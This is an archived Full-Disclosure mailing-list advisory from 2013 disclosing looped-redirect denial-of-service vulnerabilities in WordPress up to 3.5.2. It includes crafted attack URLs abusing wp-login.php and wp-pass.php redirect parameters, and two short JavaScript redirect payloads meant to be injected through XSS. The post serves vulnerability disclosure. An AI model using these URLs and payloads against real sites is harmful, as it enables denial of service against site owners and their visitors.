lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <008601ce735b$c1578680$9b7a6fd5@pc>
Date: Thu, 27 Jun 2013 20:28:00 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Denial of Service in WordPress

Hello list!

These are Denial of Service vulnerabilities WordPress. Which I've disclosed 
two days ago (http://websecurity.com.ua/6600/).

About XSS vulnerabilities in WordPress, which exist in two redirectors, I 
wrote last year (http://seclists.org/fulldisclosure/2012/Mar/343). About 
Redirector vulnerabilities in these WP scripts I wrote already in 2007 (and 
made patches for them). The developers fixed redirectors in WP 2.3, so 
Redirector and XSS attacks are possible only in previous versions.

As I've recently checked, this functionality can be used for conducting DoS 
attacks. I.e. to make Looped DoS vulnerabilities from two redirectors 
(according to Classification of DoS vulnerabilities in web applications 
(http://websecurity.com.ua/2663/)), by combining web site on WordPress with 
redirecting service or other site. This attack is similar to looping two 
redirectors, described in my articles Redirectors' hell and Hellfire for 
redirectors. The interesting, that looped redirector 
(http://tinyurl.com/hellfire-url), which I've made at 5th of February 2009 
for my article Hellfire for redirectors, is still working.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of WordPress: for easy attack - WP 2.2.3 and 
previous versions, for harder attack - WP 3.5.2 and previous versions. The 
second variant of attack requires Redirector or XSS vulnerability at the 
same domain, as web site on WP.

----------
Details:
----------

Denial of Service (WASC-10):

It's needed to create Custom alias at tinyurl.com or other redirector 
service, which will be leading to wp-login.php or wp-pass.php with setting 
alias for redirection.

http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1

http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2

Here are examples of these vulnerabilities:

http://tinyurl.com/loopeddos1

http://tinyurl.com/loopeddos2

This attack will work for WordPress < 2.3. At that Mozilla, Firefox, Chrome 
and Opera will stop endless redirect after series of requests, unlike IE.

To make this attack work in all versions of the engine, including WordPress 
3.5.2, it's needed that redirector was on the same domain, as web site on 
WP. For this it can be used any vulnerability, e.g. reflected XSS or 
persistent XSS (at the same domain), for including a script for redirecting 
to one of these redirectors:

WordPress_Looped_DoS.html

<script>document.location="http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html"</script>

WordPress_Looped_DoS-2.html

<script>document.location="http://site/wp-pass.php"</script>

This attack will work as in WordPress 3.5.2 and previous versions, as it 
isn't stopping by the browsers (endless redirect).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists